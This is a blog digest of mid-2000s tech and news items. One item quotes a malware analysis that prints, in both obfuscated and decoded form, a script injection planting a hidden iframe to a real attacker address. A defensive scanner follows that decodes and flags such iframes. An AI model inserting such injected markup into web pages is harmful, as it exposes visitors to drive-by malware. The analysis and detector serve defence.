One-born-every-minute Department (contd.)

From The Inquirer

AT LEAST 23 PEOPLE fell for a scam from a bloke who claimed to be flogging an Apple iPhone on eBay.

One person was prepared to stump up $1,125 to own an iPhone before it reaches the shops, or indeed the manufacturers.

Apple has said that it will not be releasing the phone until sometime in June, but that did not stop eBay seller rgonzales23455 telling marks that he had six of them.

Computerworld emailed Rgonzales23455 and asked him how he got his paws on six of the machines before they had been released. He didn’t reply and neither did Apple.

eBay, however, said that it pulled the listings and was warning that any such listings claiming to be selling the Apple iPhone are in violation of eBay’s pre-sale policy.

A grisly ‘first’

From today’s edition of The Register

Police are investigating the unexplained death of a man who appeared to commit suicide in front of an audience of webcam chatroom users.

Kevin Neil Whitrick, 42, from Wellington in Shropshire, was found at about 11.15pm on Wednesday by officers who went to his home following a report from a fellow chatroom user.

Resuscitation attempts failed, and he was pronounced dead at the scene. A post mortem was carried out on Friday morning, which confirmed the cause of death as hanging. A Coroner’s inquest will open on Monday.

Mr Whitrick was father to 12-year old twins. His ex-wife said he suffered a very serious car accident in July 2006, and had never fully recovered.

Lead investigator Detective Chief Inspector Jon Groves said: “Our enquiries to date have revealed that Mr Whitrick was using a chatroom with a number of other people at the time of his death.

“We are liaising with the internet service provider at this time to contact other users who were online at the time of this incident and who may have information that could assist our enquiries.”

ConceptShare

Collaborative work is hard — and even harder when you have to do it online. So ConceptShare is an interesting idea — described as “Web-Based Idea and Design Sharing and Collaboration”. I can see lots of industrial applications for it.

Back to Basics

Stanford has launched an intriguing new project — Clean Slate Design for the Internet.

We believe that the current Internet has significant deficiencies that need to be solved before it can become a unified global communication infrastructure. Further, we believe the Internet’s shortcomings will not be resolved by the conventional incremental and ‘backward-compatible’ style of academic and industrial networking research. The proposed program will focus on unconventional, bold, and long-term research that tries to break the network’s ossification. To this end, the research program can be characterized by two research questions: “With what we know today, if we were to start again with a clean slate, how would we design a global communications infrastructure?”, and “How should the Internet look in 15 years?” We will measure our success in the long-term: We intend to look back in 15 years time and see significant impact from our program.

In the spirit of past successful inter-disciplinary research programs at Stanford, the program will be driven by research projects ‘from the ground up’. Rather than build a grand infrastructure and tightly coordinated research agenda, we will create a loosely-coupled breeding ground for new ideas. Some projects will be very small, while others will involve multiple researchers; our goal is to be flexible, creating the structure and identifying and focusing funds to support the best research in clean-slate design.

The subprime mortgage racket explained

At last! — an explanation I can understand of the biggest financial scandal since the Savings & Loan racket of the Reagan years. It’s by Steven Pearlstein of the Washington Post. In his talk at the interesting SNS Dinner in London recently, Mark Anderson went on about the subprime market at some length and I felt thoroughly abashed by my ignorance (for photograph of abashed blogger, see here!)

The downsides of ‘free’ information

Peter Wayner gave an interesting talk at Google pointing out the downsides of the decline in print journalism and suggesting some things that might be done about it. Here’s one of his ideas:

Let me say that I’m a big believer in fair use. I think it’s very important for people to be able to quote frequently and liberally. But some blogs take this to an extreme. It’s easy to find blogs that are 80, 90, even 95 percent borrowed text. Some frequently cut huge chunks of an article and then wrap it with the thinnest amount of comment. Not surprisingly, some of these folks are big believers in “fair use”. I can think of one blog where the writers spend more time agitating for fair use than they do writing their thin, snarky wrapper around huge blocks of borrowed text.

I don’t think these sites are necessarily bad, but I think they end up taking an unfair amount of the return on the content. Many sell ads and some even support nice lifestyles without consuming too much shoe leather in gathering the content.

So why not add another term to the exponentially growing PageRank equation. Declan McCullagh suggested this during dinner last night. Why not compute the fraction of the text that’s original and the fraction that’s borrowed? This is possible to do because most bloggers are kind enough to include a link to the original text. If they don’t, it’s usually possible for a few searches of complete sentences to find the original.

Let’s call this LeechRank. If 20% of the text is borrowed, let’s do nothing to the PageRank. If 50% is borrowed, we bump them down a few notches. If 80% is borrowed, let’s send them down 20 to 30 notches. And if 100% is borrowed, as some pirates do, well, let’s just knock them straight out to the bottom of the listings, sort of a way station on their trip to the circle in hell reserved for people who steal and destroy a person’s livelihood.

This is a very thoughtful speech. It highlights the fact that while the Web and the blogosphere can easily provide much of the crap (celeb gossip, lifestyle journalism, infotainment) that takes up so much space in today’s newspapers, there’s no indication yet that it could replace the expensive investigating and reporting that responsible newspapers (and broadcasters) do. In the UK, for example, Jonathan Aitken would have gone unpunished if the Guardian hadn’t taken a very risky legal stand and contested his libel action against the paper. The same thing happened recently when Alan Rusbridger challenged a gagging injunction that the Government had clapped against reporting a development in the “cash for honours” investigation.

Who in the emerging ecosystem will do things — take risks — like that? Google? Perish the thought.

I like the idea of a LeechRank!

Thanks to Tim O’Reilly for pointing me to the piece.

Multitasking: bad idea

Be warned! The New York Times reports that multitasking is bad for you.

Several research reports, both recently published and not yet published, provide evidence of the limits of multitasking. The findings, according to neuroscientists, psychologists and management professors, suggest that many people would be wise to curb their multitasking behavior when working in an office, studying or driving a car.

These experts have some basic advice. Check e-mail messages once an hour, at most. Listening to soothing background music while studying may improve concentration. But other distractions — most songs with lyrics, instant messaging, television shows — hamper performance. Driving while talking on a cellphone, even with a hands-free headset, is a bad idea.

In short, the answer appears to lie in managing the technology, instead of merely yielding to its incessant tug.

“Multitasking is going to slow you down, increasing the chances of mistakes,” said David E. Meyer, a cognitive scientist and director of the Brain, Cognition and Action Laboratory at the University of Michigan. “Disruptions and interruptions are a bad deal from the standpoint of our ability to process information.”

The new malware ecology

Ethan Zuckerman has a fascinating story about how contemporary malware works.

It begins with him Googling a friend to find the URL of her home page, only to find that Google wouldn’t connect him to her site and flashed up the warning “This site may harm your computer”. It transpired that this is the result of the StopBadware campaign run by the folks at the Berkman Center; Google identifies sites that it believes are spreading malware and registers them with StopBadware. If a site has been blacklisted, its owner has the option of protesting and having his/her case reviewed by the Berkman people. Ethan duly protested on his friend’s behalf…

Within half an hour, three of my colleagues pointed me to the source code of my friend’s page. At the top of her index page was a strange-looking piece of Javascript:

<script language="javascript"> document.write( unescape(
‘%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68
%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34
%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D
%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%22%30%22%20%77%69%64%74%68%3D%22%31%22%20
%68%65%69%67%68%74%3D%22%31%22%20%73%63%72
%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61
%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69
%66%72%61%6D%65%3E’
) );

That’s some seriously obfuscated Javascript. But if you translate from hexadecimal to ASCII, the code’s pretty clear – it inserts the following code into the top of the HTML page:

< iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter>< /iframe>

The code opens an “iframe”, an inline frame which allows another web page to be embedded within a page – iframes are pretty useful things, especially for building interactive applications in web pages. But this frame is pretty sinister. It opens a one pixel by one pixel frame which attempts to load the webpage located at http://81.95.146.98/index.html.

That page doesn’t load on my browser – the server is apparently refusing connections, at least from my Macintosh – but it occupies an IP in a block of addresses controlled by a charming bunch of guys who do business as RBusiness Network. Google for them and you’ll mostly find lots of angry message board posts from spamfighters – the RBusiness folks operate a number of servers advertised in spam emails and are suspected of relaying large amounts of spam. Many of the RBusiness-associated webpages are in Russian, though their servers are currently in Panama City, Panama – some antispammers believe that RBusiness is short for “Russian Business Network”, which was evidently their previous operating name.

Googling for the specific IP – 81.95.146.98 – turns up a couple of pages with people documenting an interesting exploit – the Microsoft Data Access Components exploit. Basically, when you load this iframe, it runs a small script which downloads and runs a Windows executable file. That file downloads a rootkit, a password sniffer and opens a backdoor into the user’s system. (Needless to say, this only happens on Microsoft Windows systems running unpatched software… which is to say, many Windows systems.) According to Ivan Macalintal, this iframe was installing code from websites that looked fairly innocuous, including one that promised to help you write your company’s travel policy. (Remarkably, this site is the #1 match for a search for “travel policy” on Google, though Google doesn’t let you click directly to the page, stopping you with a “harm your computer” message.)

It’s possible that this is what my friend’s site was trying to install – Ivan’s report dates from October 2006. It’s also possible that it was trying to install a more recent package of malware – Trojan-PSW.Win32.Small.bs – which Avira saw linked to the 81.95.126.98 domain in early January of this year. This little nasty logs passwords entered on webpages, opens a SOCKS proxy on your machine and calls home to an RBusiness server to let the bad guys know how to take advantage of your new machine to send spams and retrieve your passwords.

So had Ethan’s friend got into bed with these Russian hoodlums? Unlikely.

Simply put, [her site] was hacked. Not content with setting up websites to spread their trojan horses, the RBusiness boys have been breaking into blog and wiki sites and installing this new iframe. In some cases, they’re able to guess default passwords; in other cases, they exploit unpatched bugs in software. I was all ready to go to Berkman yesterday with my tail between my legs and tell my colleagues that my friend’s server had been compromised. But my friends were already dealing with the fact that Google had found malicious iframes on a number of Harvard-affiliated sites, including several blogs hosted on the blogs.law.harvard.edu server! Stop Badware, yesterday at least, was stopping Berkman.

Which is deeply ironic, given what the StopBadware initiative was set up to do. But in a way, it only goes to underscore how complex and dangerous our software monoculture has become.
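The decoding step Ethan describes, turning the percent-encoded string back into markup and spotting the one-pixel frame, is something a site owner can automate over their own pages. The sketch below is an added example, not code from Ethan's post or from StopBadware; the function names, the "1 pixel or less" threshold and the sample page (which points at the documentation-only address 192.0.2.10) are constructed for illustration.

```javascript
// Added example: find hidden iframes, including ones emitted by
// document.write(unescape('%..')) calls. Nothing is executed, only decoded.
const WRITE_UNESCAPE = /document\.write\(\s*unescape\(\s*(['"])([\s\S]*?)\1\s*\)\s*\)/gi;

// Decode %XX escapes after removing the line breaks used to wrap the payload.
function decodePercent(encoded) {
  return encoded
    .replace(/\s+/g, '')
    .replace(/%([0-9a-f]{2})/gi, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Return the markup that each obfuscated document.write call would insert.
function decodeInjectedMarkup(html) {
  return Array.from(html.matchAll(WRITE_UNESCAPE), (m) => decodePercent(m[2]));
}

// Read one attribute value (double-quoted, single-quoted or bare) from a tag.
function attr(tag, name) {
  const re = new RegExp('\\b' + name + '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i');
  const m = re.exec(tag);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// List iframes whose width and height are both 1 or less (invisible to a visitor).
function findHiddenIframes(markup) {
  const tags = markup.match(/<\s*iframe\b[^>]*>/gi) || [];
  return tags
    .map((t) => ({ src: attr(t, 'src'), width: attr(t, 'width'), height: attr(t, 'height') }))
    .filter((f) => parseInt(f.width, 10) <= 1 && parseInt(f.height, 10) <= 1);
}

// Scan the literal markup plus whatever the obfuscated writes decode to.
function scanPage(html) {
  const findings = findHiddenIframes(html).map((f) => ({ ...f, obfuscated: false }));
  for (const decoded of decodeInjectedMarkup(html)) {
    for (const f of findHiddenIframes(decoded)) findings.push({ ...f, obfuscated: true });
  }
  return findings;
}

// Constructed sample: one ordinary visible iframe and one 1x1 iframe hidden
// behind percent-encoding. 192.0.2.10 is a documentation-only address.
const hidden = '<iframe src= http://192.0.2.10/index.html frameborder="0" ' +
  'width="1" height="1" scrolling="no" name=counter></iframe>';
const encoded = Array.from(hidden, (c) => '%' + c.charCodeAt(0).toString(16).toUpperCase())
  .join('').replace(/(.{42})/g, '$1\n');
const samplePage = '<html><head><script language="javascript"> document.write( unescape(\n\'' +
  encoded + '\'\n) );</script></head>\n' +
  '<body><iframe src="/map.html" width="600" height="400"></iframe></body></html>';

console.log(scanPage(samplePage));
```

Run against a site's templates and stored posts, a non-empty result with `obfuscated: true` is the signal worth investigating, since legitimate embeds rarely need to hide their markup from a reader of the source.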

The absurdity of consistency

Quentin pointed me to this post in The Dilbert Blog. It reads, in part:

One of the most potent forms of persuasion has to do with people’s innate need to be consistent. Studies show that people will ignore logic and information to be consistent. (In other words, we are moist robots.) According to the research, humans are hardwired for consistency over reason. You already knew that: People don’t switch political parties or religions easily. What you didn’t know is how quickly and easily a manipulator can lock someone into a position.

For example, researchers asked people to write essays in support of a random point of view they did not hold. Months later, when surveyed, the majority held the opinion they wrote about, regardless of the topic. Once a person commits an opinion to writing – even an opinion he does not hold – it soon becomes his actual opinion. Not every time, but MOST of the time. The people in these experiments weren’t exposed to new information before writing their contrived opinions. All they did was sit down and write an opinion they didn’t actually have, and months later it became their actual opinion. The experiment worked whether the volunteers were writing the pro or the con position on the random topic.

Most of the truly stupid things done in this world have to do with this consistency principle. For example, once you define yourself as a loyal citizen of Elbonia, you do whatever the King of Elbonia tells you to do, no matter how stupid that is. And your mind invents reasons as to why dying is a perfectly good life strategy.

Right on. I’ve always thought that consistency is a puerile obsession. Oscar Wilde described it as “the last refuge of the unimaginative”. When Maynard Keynes was once accused (I think by a journalist) of changing his mind, he replied, “When the facts change, I change my mind. What do you do, sir?”

And one of the most nauseating aspects of modern British political journalism is the triumphant cry of “U Turn!” that goes up whenever a politician changes his or her mind. It seems to me that U-turns are a sure sign of a sentient, thinking being.

The Dilbert post attracted many idiotic comments, but one stood out from the crowd. It quoted this paragraph from Ralph Waldo Emerson’s essay on Self-Reliance:

A foolish consistency is the hobgoblin of little minds, adored by little statesmen and philosophers and divines. With consistency a great soul has simply nothing to do. He may as well concern himself with his shadow on the wall. Speak what you think now in hard words, and to-morrow speak what to-morrow thinks in hard words again, though it contradict every thing you said to-day. — ‘Ah, so you shall be sure to be misunderstood.’ — Is it so bad, then, to be misunderstood? Pythagoras was misunderstood, and Socrates, and Jesus, and Luther, and Copernicus, and Galileo, and Newton, and every pure and wise spirit that ever took flesh. To be great is to be misunderstood.

The very model of a modern creative society? I don’t think so

This morning’s Observer column

[Tom] Lehrer is famous for many things, but chief among them is his famous observation that ‘satire died the day Henry Kissinger was awarded the Nobel Peace Prize’. The song of his that I like most is ‘The Elements Song’, in which he recites the names of all the elements of the periodic table at high speed and without fudging a syllable, while at the same time playing a stirring piano accompaniment of what he described as ‘a barely recognisable tune’. It’s an astonishing performance and it resides happily on my iPod.

The other day, I chanced on a link to a lovely piece of Flash animation (see it for yourself here), in which a chap named Mike Stanfill took the Lehrer soundtrack and visually added the names of the elements in a witty – and technically very demanding – way. My first reaction was pure pleasure. My second thought was that this provides a good object lesson for understanding the current debate about intellectual property in a digital age…

Later… Adam Hodgkin pointed out a lovely Lehrer song about the virtues of plagiarism!